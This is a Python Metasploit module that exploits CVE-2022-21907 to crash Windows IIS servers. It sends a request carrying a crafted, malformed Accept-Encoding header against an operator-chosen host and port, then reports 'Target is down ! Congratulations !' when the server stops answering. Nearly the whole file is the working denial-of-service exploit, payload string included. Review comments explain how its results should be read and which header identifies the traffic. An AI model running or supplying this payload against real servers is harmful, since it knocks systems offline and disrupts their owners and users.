py_dos_iis_2022_21907.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
This module requires Metasploit: https://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
This module performs a DOS attack using a simple HTTP request.
"""
from urllib.error import URLError, HTTPError
from urllib.request import Request, urlopen
from ssl import _create_unverified_context
from logging import info, error
from os.path import basename
from socket import timeout
from typing import Dict
from metasploit import module
# Descriptor handed to module.run() at the bottom of the file. The "type"
# field marks this as a denial-of-service module: despite the "Remote Code
# Execution" wording in the CVE title, the code in this file only attempts to
# crash the host. Remediation is the vendor update tracked under the CVE
# reference listed here.
_REFERENCES = [
    {"type": "cve", "ref": "2022-21907"},
    {
        "type": "url",
        "ref": "https://nvd.nist.gov/vuln/detail/CVE-2022-21907",
    },
    {
        "type": "url",
        "ref": "https://github.com/mauricelambert/CVE-2022-21907",
    },
]

# Operator-supplied options. "rhost" has no default and is required.
# "verbose" is declared here but run() never reads it.
_OPTIONS = {
    "rhost": {
        "type": "address",
        "description": "Target address",
        "required": True,
        "default": None,
    },
    "rport": {
        "type": "int",
        "description": "Target port",
        "required": True,
        "default": 80,
    },
    "verbose": {
        "type": "bool",
        "description": "Verbose mode",
        "required": False,
        "default": None,
    },
    "ssl": {
        "type": "bool",
        "description": "Use SSL",
        "required": False,
        "default": False,
    },
}

metadata = {
    "name": "CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability - Windows IIS DOS BlueScreen",
    "description": "This module can be used to perform a DOS attack on IIS server. This module exploit the CVE-2022-21907 and causes a Blue Screen with only one payload.",
    "license": "MSF_LICENSE",
    "authors": ["Maurice LAMBERT <[email protected]>"],
    "date": "2022-01-11",
    "references": _REFERENCES,
    "type": "dos",
    "options": _OPTIONS,
}
def run(args: Dict[str, str]) -> None:
    """
    Send one baseline request, then one request with a malformed
    ``Accept-Encoding`` header, and log how the second one ended.

    Reads ``rhost``, ``rport`` and ``ssl`` from *args*. Nothing is returned;
    the outcome is only reported through the logging calls.

    Notes for anyone interpreting the result:

    * A timeout or ``URLError`` on the second request is logged as "down".
      ``HTTPError`` is a subclass of ``URLError``, so an HTTP error status
      returned by a server that handled the request lands in the same
      branch. The message is therefore an inference, not a confirmed crash.
    * The request differs from ordinary traffic only in its
      ``Accept-Encoding`` value, so that header is the field to log or
      inspect when looking for this traffic.
    * With ``ssl`` enabled the TLS context comes from the private helper
      ``ssl._create_unverified_context``, so the server certificate is not
      verified.
    """
    host = args["rhost"]
    port = args["rport"]

    # The option may arrive as an empty/false value or as the string "false";
    # both mean plain HTTP.
    use_tls = bool(args["ssl"]) and args["ssl"] != "false"
    scheme = "https" if use_tls else "http"
    url = f"{scheme}://{host}:{port}"

    def tls_context():
        # A fresh unverified context per request when TLS is on, else None.
        return _create_unverified_context() if use_tls else None

    crafted_headers = {
        "Accept-Encoding": "AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,"
    }

    module.LogHandler.setup(msg_prefix=f"{basename(__file__)}[{host}:{port}] - ")

    # Baseline: is the web service answering at all? An HTTP error status
    # still counts as "answering". No timeout is passed to this call.
    info("Trying first connection...")
    try:
        urlopen(url, context=tls_context())
    except HTTPError:
        pass
    except Exception:
        error(
            f"The connection was refused by the remote host ({host}:{port})."
        )
        error(
            f"Auxiliary aborted due to failure: unreachable: {host}:{port} - Could not connect to web service - no response"
        )
        return

    info("First connection OK. Sending payload...")
    try:
        urlopen(
            Request(url, headers=crafted_headers),
            context=tls_context(),
            timeout=10,
        )
    except (timeout, TimeoutError, URLError):
        # No usable answer within 10 seconds, or any URLError (HTTPError
        # included): reported as the host being down.
        info("Target is down ! Congratulations !")
        return
    except Exception as exc:
        error(f"{exc.__class__.__name__}: {exc}")

    # NOTE(review): the listing on the page lost its indentation. This line
    # is placed after the try block, so it runs when the request was served
    # or failed with an unrelated exception. Confirm against the upstream
    # file.
    error("Target is not vulnerable and up.")
# Script entry point: pass the descriptor and the run() callback to the
# metasploit helper library. What module.run() does with them is not shown in
# this file; presumably it handles the exchange with the framework (confirm
# against the library).
if __name__ == "__main__":
    module.run(metadata, run)